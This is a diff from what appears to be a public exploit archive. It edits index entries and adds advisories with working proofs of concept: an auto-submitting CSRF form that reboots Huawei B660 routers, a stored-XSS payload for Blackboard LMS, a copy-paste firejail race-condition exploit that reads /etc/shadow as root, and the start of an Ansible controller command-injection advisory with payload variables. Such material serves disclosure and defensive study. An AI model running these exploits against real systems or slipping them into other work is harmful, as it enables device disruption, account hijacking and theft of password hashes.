 27648,platforms/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
@ -29506,10 +29515,10 @@ id,file,description,date,author,platform,type,port
 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
 28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0
-28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
+28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
-28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
+28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
-28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
+28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
-28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
+28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0
 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0
 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0
@ -36943,9 +36952,16 @@ id,file,description,date,author,platform,type,port
 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
 40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
 41027,platforms/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
 41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
 41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
-41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
+41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' Parameter SQL Injection",2017-01-10,JaMbA,php,webapps,0
 41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
 41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
 41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
 41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
 41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
 41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
 41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
--- a/platforms/hardware/webapps/41017.txt
+++ b/platforms/hardware/webapps/41017.txt
@ -0,0 +1,192 @@
 Document Title:
 ===============
 Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2025
 Release Date:
 =============
 2017-01-10
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2025
 Common Vulnerability Scoring System:
 ====================================
 4.4
 Product & Service Introduction:
 ===============================
 The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
 (Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-01-10:	Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Huawei
 Product: Flybox - Router (Web-Application) B660 3G/4G
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 A remote cross-site request forgery (CSRF) vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
 The security vulnerability allows remote attackers to submit special requests to the affected product which could lead reboot the Product.
 The vulnerability is located in the `/htmlcode/html/reboot.cgi` and `/htmlcode/html/system_reboot.asp` file modules and `RequestFile` 
 parameter of the localhost path URL. Remote attackers are able to reboot any Huawei Flybox B660 via unauthenticated POST method request.
 The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
 Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction. 
 Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected 
 device backend modules.
 Request Method(s):
 [+] POST
 Vulnerable Module(s):
 [+] /htmlcode/html/reboot.cgi
 [+] /htmlcode/html/system_reboot.asp
 Vulnerable Parameter(s):
 [+] RequestFile
 Software version of the modem:
 1066.12.15.01.200
 Hardware version of the modem:
 WLB3TCLU
 Name of the device:
 B660
 Hardware version of the router:
 WL1B660I001
 Software version of the router:
 1066.11.15.02.110sp01
 Proof of Concept (PoC):
 =======================
 The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 --- PoC Session Logs ---
 POST /htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: localhost/htmlcode/html/system_reboot.asp
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 0
 HTTP/1.1 200 OK
 CACHE-CONTROL: no-cache
 Content-Type: text/html
 Content-Length: 364
 <html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>replace</title>
 <body>
 <script language="JavaScript" type="text/javascript">
 var pageName = '/';
 top.location.replace(pageName);
 </script>
 </body>
 </html>
 Note: Attacker are able to reboot the device itself without being authenticated to it . 
 Also an Attacker can put an auto-submit javascript-generated form inside an high traffic website to compromise.
 PoC: CSRF Exploit
 <html>
  <!-- CSRF PoC By SaifAllah benMassaoud -->
  <body>
    <form  id="test" action="http://192.168.1.1/htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp" method="POST">
    </form>
    <script>document.getElementById('test').submit();</script>
  </body>
 </html>
 Security Risk:
 ==============
 The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research team] - SaifAllah benMassaoud - (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
--- a/platforms/java/webapps/41014.txt
+++ b/platforms/java/webapps/41014.txt
@ -0,0 +1,196 @@
 Document Title:
 ===============
 Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability 
 References (Source):
 ====================
 http://www.vulnerability-lab.com/get_content.php?id=1900
 Release Date:
 =============
 2017-01-09
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1900
 Common Vulnerability Scoring System:
 ====================================
 4.2
 Product & Service Introduction:
 ===============================
 Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system 
 developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable 
 design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted 
 by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop 
 completely online courses with few or no face-to-face meetings.
 (Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-01-09:	Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 BlackBoard Inc.
 Product: Blackboard LMS - Content Management System 9.1 SP 14
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 A persistent cross site scripting web vulnerability has been discovered in Blackboard LMS official web-application. 
 Remote attackers are able to inject malicious  code into profile information module, the vulnerability is located in 
 the first name,last name of user profile, the vulnerable fields in the module (userVO.firstName & userVO.lastName).
 The issue allows an attacker to inject own malicious java script codes to the vulnerable modules context. The execution 
 of the vulnerability occurs in Blackboard LMS main panel & user management module. Due to our investigation we discovered 
 that users with low privileged access are able to to inject their own java code to compromise other moderator or admin 
 session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execute 
 occurs each time an account visits the profile page of the attacking user account.
 The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2 
 Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction. 
 Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external 
 redirect to malicious sources and application-side manipulation of affected or connected module context.
 Proof of Concept (PoC):
 =======================
 The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 Manual steps to reproduce the vulnerability ...
 1. User register in the blackboard LMS course as student . 
 2. User goes to profile information section and inject the code persistent payload > into the firstname or lastname input fields 
 Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
 3. User submits data and saves it via POST method request with out secure parse by the web validation
 4. The execution of vulnerability occurs in the user management: 
 https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1 
 5. Successfully reproduce the application-side web validation vulnerability! 
 --- PoC Session Logs [POST] ---
 POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
 Host: b-lms.localhost:8000
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
 Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2; 
 __utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true; 
 NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887; 
 s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 605
 userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
 Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
 &userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
 &userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
 &userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
 -
 RESPONSE
 HTTP/1.1 200 OK
 Date: Mon, 08 Aug 2016 11:06:31 GMT
 Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
 X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
 P3P: CP="CAO PSA OUR"
 X-Blackboard-product: Blackboard Learn &#8482; 9.1.140152.0
 Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
 Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
 Pragma: no-cache
 Cache-Control: no-cache, no-store
 Expires: Thu, 01 Jan 1970 00:00:00 GMT
 Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
 Content-Language: en-US
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html;charset=UTF-8
 Reference(s):
 https://b-lms.localhost:8000/
 https://b-lms.localhost:8000/webapps/
 https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
 https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a secure parse or encode of the vulnerable firstname and lastname input fields.
 Disallow the usage of special chars and filter the entries by an escape. Parse the output context in the profile.form to 
 prevent application-side executions.
 Security Risk:
 ==============
 The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)
 Credits & Authors:
 ==================
 Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
 including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
 including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
 of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
 limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
 redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
 its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
 authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
--- a/platforms/linux/local/41022.txt
+++ b/platforms/linux/local/41022.txt
@ -0,0 +1,316 @@
 # firejail advisory for TOCTOU in --get and --put (local root)
 Releasing a brief advisory/writeup about a local root privesc found in firejail that we reported back in Nov, 2016. This is in response to a recent [thread](http://seclists.org/oss-sec/2017/q1/20) on oss-sec where people seem interested in details of firejail security issues. This particular vulnerability was fixed in commit [e152e2d](https://github.com/netblue30/firejail/commit/e152e2d067e17be33c7e82ce438c8ae740af6a66) but no CVE was assigned.
 ## Vulnerability
 This is a TOCTOU (race condition) bug when testing access permissions with access() and then calling copy_file(). At the time of discovery, it was clear the code suffered from many insecure coding constructs like this and much more -- but there was no guideline around making security related bug reports (other than using the public issue tracker).
 ### Code: src/firejail/ls.c
 ~~~~
 void sandboxfs(int op, pid_t pid, const char *path) {
        EUID_ASSERT();
        // if the pid is that of a firejail  process, use the pid of the first child process
        EUID_ROOT();
        char *comm = pid_proc_comm(pid);
        EUID_USER();
        if (comm) {
                if (strcmp(comm, "firejail") == 0) {
                        pid_t child;
                        if (find_child(pid, &child) == 0) {
                                pid = child;
                        }
                }
                free(comm);
        }
        // check privileges for non-root users
        uid_t uid = getuid();
        if (uid != 0) {
                uid_t sandbox_uid = pid_get_uid(pid);
                if (uid != sandbox_uid) {
                        fprintf(stderr, "Error: permission denied.\n");
                        exit(1);
                }
        }
        // full path or file in current directory?
        char *fname;
        if (*path == '/') {
                fname = strdup(path);
                if (!fname)
                        errExit("strdup");
        }
        else if (*path == '~') {
                if (asprintf(&fname, "%s%s", cfg.homedir, path + 1) == -1)
                        errExit("asprintf");
        }
        else {
                fprintf(stderr, "Error: Cannot access %s\n", path);
                exit(1);
        }
        // sandbox root directory
        char *rootdir;
        if (asprintf(&rootdir, "/proc/%d/root", pid) == -1)
                errExit("asprintf");
        if (op == SANDBOX_FS_LS) {
                EUID_ROOT();
                // chroot
                if (chroot(rootdir) < 0)
                        errExit("chroot");
                if (chdir("/") < 0)
                        errExit("chdir");
                // access chek is performed with the real UID
                if (access(fname, R_OK) == -1) {
                        fprintf(stderr, "Error: Cannot access %s\n", fname);
                        exit(1);
                }
                // list directory contents
                struct stat s;
                if (stat(fname, &s) == -1) {
                        fprintf(stderr, "Error: Cannot access %s\n", fname);
                        exit(1);
                }
                if (S_ISDIR(s.st_mode)) {
                        char *rp = realpath(fname, NULL);
                        if (!rp) {
                                fprintf(stderr, "Error: Cannot access %s\n", fname);
                                exit(1);
                        }
                        if (arg_debug)
                                printf("realpath %s\n", rp);
                        char *dir;
                        if (asprintf(&dir, "%s/", rp) == -1)
                                errExit("asprintf");
                        print_directory(dir);
                        free(rp);
                        free(dir);
                }
                else {
                        char *rp = realpath(fname, NULL);
                        if (!rp) {
                                fprintf(stderr, "Error: Cannot access %s\n", fname);
                                exit(1);
                        }
                        if (arg_debug)
                                printf("realpath %s\n", rp);
                        char *split = strrchr(rp, '/');
                        if (split) {
                                *split = '\0';
                                char *rp2 = split + 1;
                                if (arg_debug)
                                        printf("path %s, file %s\n", rp, rp2);
                                print_file_or_dir(rp, rp2, 1);
                        }
                        free(rp);
                }
        }
        // get file from sandbox and store it in the current directory
        else if (op == SANDBOX_FS_GET) {
                // check source file (sandbox)
                char *src_fname;
                if (asprintf(&src_fname, "%s%s", rootdir, fname) == -1)
                        errExit("asprintf");
                EUID_ROOT();
                struct stat s;
                if (stat(src_fname, &s) == -1) {
                        fprintf(stderr, "Error: Cannot access %s\n", fname);
                        exit(1);
                }
                // try to open the source file - we need to chroot
                pid_t child = fork();
                if (child < 0)
                        errExit("fork");
                if (child == 0) {
                        // chroot
                        if (chroot(rootdir) < 0)
                                errExit("chroot");
                        if (chdir("/") < 0)
                                errExit("chdir");
                        // drop privileges
                        drop_privs(0);
                        // try to read the file
                        if (access(fname, R_OK) == -1) {
                                fprintf(stderr, "Error: Cannot read %s\n", fname);
                                exit(1);
                        }
                        exit(0);
                }
                // wait for the child to finish
                int status = 0;
                waitpid(child, &status, 0);
                if (WIFEXITED(status) && WEXITSTATUS(status) == 0);
                else
                        exit(1);
                EUID_USER();
                // check destination file (host)
                char *dest_fname = strrchr(fname, '/');
                if (!dest_fname || *(++dest_fname) == '\0') {
                        fprintf(stderr, "Error: invalid file name %s\n", fname);
                        exit(1);
                }
                if (access(dest_fname, F_OK) == -1) {
                        // try to create the file
                        FILE *fp = fopen(dest_fname, "w");
                        if (!fp) {
                                fprintf(stderr, "Error: cannot create %s\n", dest_fname);
                                exit(1);
                        }
                        fclose(fp);
                }
                else {
                        if (access(dest_fname, W_OK) == -1) {
                                fprintf(stderr, "Error: cannot write %s\n", dest_fname);
                                exit(1);
                        }
                }
                // copy file
                EUID_ROOT();
                copy_file(src_fname, dest_fname, getuid(), getgid(), 0644);
                printf("Transfer complete\n");
                EUID_USER();
        }
        free(fname);
        free(rootdir);
        exit(0);
 }
 ~~~~
 ### Code: src/firejail/util.c
 ~~~~
 int copy_file(const char *srcname, const char *destname, uid_t uid, gid_t gid, mode_t mode) {
        assert(srcname);
        assert(destname);
        // open source
        int src = open(srcname, O_RDONLY);
        if (src < 0) {
                fprintf(stderr, "Warning: cannot open %s, file not copied\n", srcname);
                return -1;
        }
        // open destination
        int dst = open(destname, O_CREAT|O_WRONLY|O_TRUNC, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
        if (dst < 0) {
                fprintf(stderr, "Warning: cannot open %s, file not copied\n", destname);
                close(src);
                return -1;
        }
        // copy
        ssize_t len;
        static const int BUFLEN = 1024;
        unsigned char buf[BUFLEN];
        while ((len = read(src, buf, BUFLEN)) > 0) {
                int done = 0;
                while (done != len) {
                        int rv = write(dst, buf + done, len - done);
                        if (rv == -1) {
                                close(src);
                                close(dst);
                                return -1;
                        }
                        done += rv;
                }
        }
        if (fchown(dst, uid, gid) == -1)
                errExit("fchown");
        if (fchmod(dst, mode) == -1)
                errExit("fchmod");
        close(src);
        close(dst);
        return 0;
 }
 </snip>
 ~~~~
 ## Testing 
 ### Our Dockerfile
 ~~~~
 FROM ubuntu:latest
 ENV wdir /root/firejail
 RUN apt-get update && apt-get install -y git gcc make
 RUN useradd -ms /bin/bash daniel && echo "daniel:password" | chpasswd
 RUN git clone https://github.com/netblue30/firejail.git ${wdir}
 WORKDIR ${wdir}
 RUN git reset --hard 81467143ee9c47d9c90e97fb55baf2d47702d372
 RUN ./configure && make && make install
 ~~~~
 ### Our exploit
 This will exploit the --get command to read /etc/shadow and print back to the console. Just copy and paste into your shell:
 ~~~~
 #dropper
 cat > gexp.sh <<GUEST_JAIL_SCRIPT_EOF
 mkdir -p /tmp/exploit
 cat > /tmp/exploit/gaolbreak.c <<TOCTOU_POC_END
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
 int main(int argc, char **argv)
 {
    char *fl = "/etc/shadow";
    if(argc > 1) {
        fl = argv[1];
    }
    while(1) {
        int fd = open("owned", O_CREAT | O_RDWR, 0777);
        if(fd == -1) {
            perror("open");
            exit(1);
        }
        close(fd);
        remove("owned");
        symlink(fl, "owned");
        remove("owned");
    }
 }
 TOCTOU_POC_END
 cd /tmp/exploit
 gcc ./gaolbreak.c -o gaolbreak
 # XXX: change argv[1] to whatever you want
 ./gaolbreak /etc/shadow
 GUEST_JAIL_SCRIPT_EOF
 # run the dropper (symlink attack) in a jail
 chmod +x ./gexp.sh
 firejail --noprofile --force --name=el ./gexp.sh &
 # win race using the vulnerable 'firejail --get' command.
 mkdir exploitel
 cd exploitel
 while [ 1 ] ; do nice -n 19 firejail --get=$(pgrep -f '^firejail.*--name=el' -n) /tmp/exploit/owned >/dev/null 2>&1; cat owned 2>/dev/null; done
 ~~~~
--- a/platforms/linux/remote/41013.txt
+++ b/platforms/linux/remote/41013.txt
@ -0,0 +1,260 @@
 ###########  Computest security advisory CT-2017-0109 #############
            Summary: Command execution on Ansible controller from host
  Affected software: Ansible
 	        CVE: CVE-2016-9587
      Reference URL: https://www.computest.nl/advisories/
                     CT-2017-0109_Ansible.txt
  Affected versions: < 2.1.4, < 2.2.1
             Credit: Undisclosed at Computest (research@computest.nl)
 Date of publication: January 9, 2017
 During a summary code review of Ansible, Computest found and exploited several
 issues that allow a compromised host to execute commands on the Ansible
 controller and thus gain access to the other hosts controlled by that
 controller. 
 This was not a full audit and further issues may or may not be present.
 About Ansible
 -------------
 "Ansible is an open-source automation engine that automates cloud provisioning,
 configuration management, and application deployment. Once installed on a
 control node, Ansible, which is an agentless architecture, connects to a managed
 node through the default OpenSSH connection type."
 							- wikipedia.org
 Technical Background
 --------------------
 A big threat to a configuration management system like Ansible, Puppet, Salt
 Stack and others, is compromise of the central node. In Ansible terms this is
 called the Controller. If the Controller is compromised, an attacker has
 unfettered access to all hosts that are controlled by the Controller. As such,
 in any deployment, the central node receives extra attention in terms of
 security measures and isolation, and threats to this node are taken even more
 seriously.
 Fortunately for team blue, in the case of Ansible the attack surface of the
 Controller is pretty small. Since Ansible is agent-less and based on push, the
 Controller does not expose any services to hosts. 
 A very interesting bit of attack surface though is in the Facts. When Ansible
 runs on a host, a JSON object with Facts is returned to the Controller. The
 Controller uses these facts for various housekeeping purposes. Some facts have
 special meaning, like the fact "ansible_python_interpreter" and
 "ansible_connection". The former defines the command to be run when Ansible is
 looking for the python interpreter, and the second determines the host Ansible
 is running against. If an attacker is able to control the first fact he can
 execute an arbitrary command, and if he is able to control the second fact he is
 able to execute on an arbitrary (Ansible-controlled) host. This can be set to
 "local" to execute on the Controller itself.
 Because of this scenario, Ansible filters out certain facts when reading the
 facts that a host returns. However, we have found 6 ways to bypass this filter.
 In the scenarios below, we will use the following variables:
 PAYLOAD = "touch /tmp/foobarbaz"
 # Define some ways to execute our payload.
 LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
 INTERPRETER_FACTS = {
 	# Note that it echoes an empty dictionary {} (it's not a format string).
 	'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
 	'ansible_connection': 'local',
 	# Become is usually enabled on the remote host, but on the Ansible
 	# controller it's likely password protected. Disable it to prevent
 	# password prompts.
 	'ansible_become': False,
 }
 Bypass #1: Adding a host
 ------------------------
 Ansible allows modules to add hosts or update the inventory. This can be very
 useful, for instance when the inventory needs to be retrieved from a IaaS
 platform like as the AWS module does. 
 If we're lucky, we can guess the inventory_hostname, in which case the host_vars
 are overwritten [2] and they will be in effect at the next task. If host_name
 doesn't match inventory_hostname, it might get executed in the play for the next
 hostgroup, also depending on the limits set on the commandline.
 # (Note that when data["add_host"] is set,
 # data["ansible_facts"] is ignored.)
 data['add_host'] = {
